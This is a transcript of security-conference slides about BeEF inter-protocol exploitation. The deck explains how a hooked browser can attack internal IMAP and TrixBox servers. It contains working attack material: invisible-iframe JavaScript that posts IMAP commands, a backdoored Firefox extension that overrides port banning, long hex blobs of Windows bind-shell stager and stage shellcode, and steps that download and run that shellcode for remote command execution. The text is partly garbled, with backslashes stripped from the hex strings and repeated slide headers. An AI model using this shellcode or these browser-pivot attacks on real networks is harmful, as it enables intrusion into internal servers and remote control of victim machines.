  • 12. • Back in 2006/2007 Wade Alcorn researched what he called Inter-Protocol exploitation • Exploit ‘tolerant’ protocol implementations, which do not drop the client connection after N errors • A properly encoded POST request can be sent to the target: • HTTP request headers are parsed as BAD COMMANDS • HTTP request body is parsed asVALID COMMANDS • HTTP request body also contains shellcode. FUN STARTS Revitalizing IPEC Inter-Protocol Exploitation
  • 13. Revitalizing IPEC Inter-Protocol Exploitation: IMAP var server = '172.16.37.151'; var port = '143'; var commands = 'a01 login root passwordna002 logout'; var target = "http://" + server + ":" + port + "/abc.html"; var iframe = beef.dom.createInvisibleIframe(); var form = document.createElement('form'); form.setAttribute('name', 'data'); form.setAttribute('action', target); form.setAttribute('method', 'post'); form.setAttribute('enctype', 'text/plain'); var input = document.createElement('input'); input.setAttribute('id', 'data1') input.setAttribute('name', 'data1') input.setAttribute('type', 'hidden'); input.setAttribute('value', commands); form.appendChild(input); iframe.contentWindow.document.body.appendChild(form); form.submit();
  • 14. • Limitations: • SOP and cross-domain restrictions • Port Banning (damn you!) • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? NOPE :D Revitalizing IPEC Inter-Protocol Exploitation: limitations
  • 15. • Limitations: • SOP and cross-domain restrictions •PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 1 On all browsers (except Opera) we can ‘blindly’ send data cross-origin with XHR, without the need to read HTTP responses. This is (usually) enough to pwn services.
  • 16. • Limitations: •SOP and cross-domain restrictions • PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 2 http://xyz.com:143/ FF: NS_ERROR_PORT_ACCESS_NOT_ALLOWED Connection to various known port (22/25/143/993/995/etc..) denied. On Firefox, an extension can override config options:
  • 17. • Limitations: •SOP and cross-domain restrictions • PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 2 Trick the victim to install a backdoor’ed Firefox extension.The pref.js file of the extension contains: // PortBanning override pref("network.security.ports.banned.override", "20,21,22,25,110,143");
  • 18. • Limitations: •SOP and cross-domain restrictions • PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 2 Only about 60 TCP ports are prohibited by Port Banning -> 65465 are allowed :D 220 - imap3 (only IE blocks it :-) 6667 - IRC (Firefox/IE only) 9100 - jetdirect 10000 - ExtraNET you name it: HP OpenView, Java RMI stuff, etc..
  • 19. • Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 3 Lots of HTTP headers are automatically created by the browser (around 400 bytes). Most of them cannot be overridden, and cross-domain they are even bigger. We can override some of them:
  • 20. • Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 3 We can save other 100 bytes overriding the UserAgent through the Firefox extension: pref("general.useragent.override", "Firefox/15.0.1");
  • 21. • Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 4 The original IPEC paper was using: Content-Type: multipart/form-data; Our approach uses, to save space: Content-Type: text/plain;
  • 22. • Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 5 Not anymore, thanks to the BeEF Bind shellcode. You have a bind shellcode which can be totally controlled through an hooked browser sitting in the same victim internal network.
  • 23. High Level Architecture from FF extension to command execution
  • 24. High Level Architecture from FF extension to command execution
  • 25. High Level Architecture from FF extension to command execution
  • 26. High Level Architecture from FF extension to command execution
  • 27. High Level Architecture from FF extension to command execution
  • 28. 28 BeEF Bind shellcode how it works • Ty Miller created a new staging Windows shellcode, which we called BeEF Bind • He was bored of reverse shells :D • stager -> 299 bytes (326 after bad-char encoding) • stage -> 792 bytes • The stager sets up a bind port on 4444/TCP to accept an HTTP POST request containing the raw stage in a parameter called ‘cmd’. var stager = "xbax6ax99xf8x25xd9xccxd9x74x24xf4x5ex31xc9" + "xb1x4bx83xc6x04x31x56x11x03x56x11xe2x9fx65" + "x10xacx5fx96xe1xcfxd6x73xd0xddx8cxf0x41xd2" + "xc7x55x6ax99x85x4dxf9xefx01x61x4ax45x77x4c" + "x4bx6bxb7x02x8fxedx4bx59xdcxcdx72x92x11x0f" + "xb3xcfxdax5dx6cx9bx49x72x19xd9x51x73xcdx55" + "xe9x0bx68xa9x9exa1x73xfax0fxbdx3bxe2x24x99" + "x9bx13xe8xf9xe7x5ax85xcax9cx5cx4fx03x5dx6f" + "xafxc8x60x5fx22x10xa5x58xddx67xddx9ax60x70" + "x26xe0xbexf5xbax42x34xadx1ex72x99x28xd5x78" + "x56x3exb1x9cx69x93xcax99xe2x12x1cx28xb0x30" + "xb8x70x62x58x99xdcxc5x65xf9xb9xbaxc3x72x2b" + "xaex72xd9x24x03x49xe1xb4x0bxdax92x86x94x70" + "x3cxabx5dx5fxbbxccx77x27x53x33x78x58x7axf0" + "x2cx08x14xd1x4cxc3xe4xdex98x44xb4x70x73x25" + "x64x31x23xcdx6exbex1cxedx91x14x35xdfxb6xc4" + "x52x22x48xfaxfexabxaex96xeexfdx79x0fxcdxd9" + "xb2xa8x2ex08xefx61xb9x04xe6xb6xc6x94x2dx95" + "x6bx3cxa5x6ex60xf9xd4x70xadxa9x81xe7x3bx38" + "xe0x96x3cx11x41x58xd3x9axb5x33x93xc9xe6xa9" + "x13x86x50x8ax47xb3x9fx07xeexfdx35xa8xa2x51" + "x9exc0x46x8bxe8x4exb8xfexbfx18x80x97xb8x8b" + "xf3x4dx47x15x6fx03x23x57x1bxd8xedx4cx16x5d" + "x37x96x26x84";
  • 29. 29 BeEF Bind shellcode how it works • The stage sets up a bind port on 4444/TCP to accept HTTP POST requests from the web browser. • Set of pipes to redirect the cmd.exe input and output. This allows to jump in the middle of the HTTP request and the cmd.exe process to implement the web server style functionality. • The command result output is returned with the Access-Control-Allow-Origin: * header. After the stage is deployed, SOP is not a problem anymore. var stage_allow_origin = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28" "x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52" + "x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" + "x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38" + "xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58" + "x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5a" + "x8bx12xebx86x5dxbbx00x10x00x00x6ax40x53x53x6ax00x68x58xa4x53xe5xffxd5" + "x89xc6x68x01x00x00x00x68x00x00x00x00x68x0cx00x00x00x68x00x00x00x00x89" + "xe3x68x00x00x00x00x89xe1x68x00x00x00x00x8dx7cx24x0cx57x53x51x68x3excf" + "xafx0exffxd5x68x00x00x00x00x89xe3x68x00x00x00x00x89xe1x68x00x00x00x00" + "x8dx7cx24x14x57x53x51x68x3excfxafx0exffxd5x8bx5cx24x08x68x00x00x00x00" + "x68x01x00x00x00x53x68xcax13xd3x1cxffxd5x8bx5cx24x04x68x00x00x00x00x68" + "x01x00x00x00x53x68xcax13xd3x1cxffxd5x89xf7x68x63x6dx64x00x89xe3xffx74" + "x24x10xffx74x24x14xffx74x24x0cx31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3c" + "x01x01x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56x53x56x68x79" + "xccx3fx86xffxd5x89xfexb9xf8x0fx00x00x8dx46x08xc6x00x00x40xe2xfax56x8d" + "xbex18x04x00x00xe8x62x00x00x00x48x54x54x50x2fx31x2ex31x20x32x30x30x20" + "x4fx4bx0dx0ax43x6fx6ex74x65x6ex74x2dx54x79x70x65x3ax20x74x65x78x74x2f" + "x68x74x6dx6cx0dx0ax41x63x63x65x73x73x2dx43x6fx6ex74x72x6fx6cx2dx41x6c" + "x6cx6fx77x2dx4fx72x69x67x69x6ex3ax20x2ax0dx0ax43x6fx6ex74x65x6ex74x2d" + "x4cx65x6ex67x74x68x3ax20x33x30x31x36x0dx0ax0dx0ax5exb9x62x00x00x00xf3" + "xa4x5ex56x68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90" + "x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68" + "xeax0fxdfxe0xffxd5x97x31xdbx53x68x02x00x11x5cx89xe6x6ax10x56x57x68xc2" + "xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5x53x53x57x68x74xecx3bxe1xff" + "xd5x57x97x68x75x6ex4dx61xffxd5x81xc4xa0x01x00x00x5ex89x3ex6ax00x68x00" + "x04x00x00x89xf3x81xc3x08x00x00x00x53xffx36x68x02xd9xc8x5fxffxd5x8bx54" + "x24x64xb9x00x04x00x00x81x3bx63x6dx64x3dx74x06x43x49xe3x3axebxf2x81xc3" + "x03x00x00x00x43x53x68x00x00x00x00x8dxbex10x04x00x00x57x68x01x00x00x00" + "x53x8bx5cx24x70x53x68x2dx57xaex5bxffxd5x5bx80x3bx0ax75xdax68xe8x03x00" + "x00x68x44xf0x35xe0xffxd5x31xc0x50x8dx5ex04x53x50x50x50x8dx5cx24x74x8b" + "x1bx53x68x18xb7x3cxb3xffxd5x85xc0x74x44x8bx46x04x85xc0x74x3dx68x00x00" + "x00x00x8dxbex14x04x00x00x57x68x86x0bx00x00x8dxbex7ax04x00x00x57x8dx5c" + "x24x70x8bx1bx53x68xadx9ex5fxbbxffxd5x6ax00x68xe8x0bx00x00x8dxbex18x04" + "x00x00x57xffx36x68xc2xebx38x5fxffxd5xffx36x68xc6x96x87x52xffxd5xe9x38" + "xfexffxff";
  • 30. • Shellcode is binary data • Stager and Stage are delivered with XMLHttpRequest.sendAsBinary • For Webkit browsers that don’t support sendAsBinary, prototype overriding on XHR object. BeEF Bind shellcode delivery and usage from within BeEF if (!XMLHttpRequest.prototype.sendAsBinary) { XMLHttpRequest.prototype.sendAsBinary = function (sData) { var nBytes = sData.length, ui8Data = new Uint8Array(nBytes); for (var nIdx = 0; nIdx < nBytes; nIdx++) { ui8Data[nIdx] = sData.charCodeAt(nIdx) & 0xff; } this.send(ui8Data); };} Stager - Stage
  • 31. • We cannot know in advance the exact size of HTTP headers. • A dummy cross-domain XHR request is sent back to BeEF, exact size of headers is calculated, and exploit junk is adjusted accordingly. • Like in all exploits, 1 byte error is enough to have a not-working exploit. • With this approach, errors are minimized and the exploit becomes reliable. BeEF Bind shellcode delivery and usage from within BeEF
  • 32. • Typical SEH exploit with EggHunter, non-IPEC: • commands + junk + shellcode + next_seh + seh + egg_hunter • Typical SEH exploit with EggHunter, IPEC: • HTTP_headers + commands + (less)junk + shellcode + next_seh + seh + egg_hunter BeEF Bind shellcode delivery and usage from within BeEF
  • 33. BeEF Bind shellcode delivery and usage from within BeEF Immunity DBG view: IMAP process memory when sending the stager
  • 34. BeEF Bind shellcode delivery and usage from within BeEF Wireshark view: exploit with shellcode stager Wireshark view: command delivery and results
  • 35. 35 BeEF Bind shellcode delivery and usage from within BeEF Ultimate fun. BeEF IPEC shell (JS) exec command get results set target
  • 36. Demo fun from phishing to internal IMAP server compromise
  • 37. • Bart Leppens ported the Win32 BeEF Bind shellcode to Linux • Great to be used as shellcode for normal Linux exploits • Great to be used as a binary with any Remote Command Execution • TrixBox <= 2.6.1 pre-auth RCE example with BeEF Bind Linux • Exploit here (through normal sockets, not from the browsers): http://www.exploit-db.com/exploits/6026/ BeEF Bind shellcode delivery and usage from within BeEF
  • 38. • Identify TrixBox in the hooked browser internal network (BeEF “internal_network_fingerprinting”module) • Get the current PHPSESSID, needed to trigger the malicious PHP code that will be leaving in PHP’s $_SESSION object • The attack vector downloads the BeEF Bind shellcode stager and executes it • Last step is send to the stager bind port the Stage contents • You’re now ready to send commands and get results from the hooked browser BeEF Bind shellcode delivery and usage from within BeEF
  • 39. Demo fun TrixBox RCE exploitation from the browser
  • 40. • Wade and the other BeEF guys • Ty and Bart for their awesome shellcodes • Mario and the other awesome speakers • If you want to support BeEF, buy our book. 50% of royalties will be used exclusively for the BeEF project (no joke)! • http://www.amazon.co.uk/Browser-Hackers-Handbook- Wade-Alcorn/dp/1118662091/ Thanks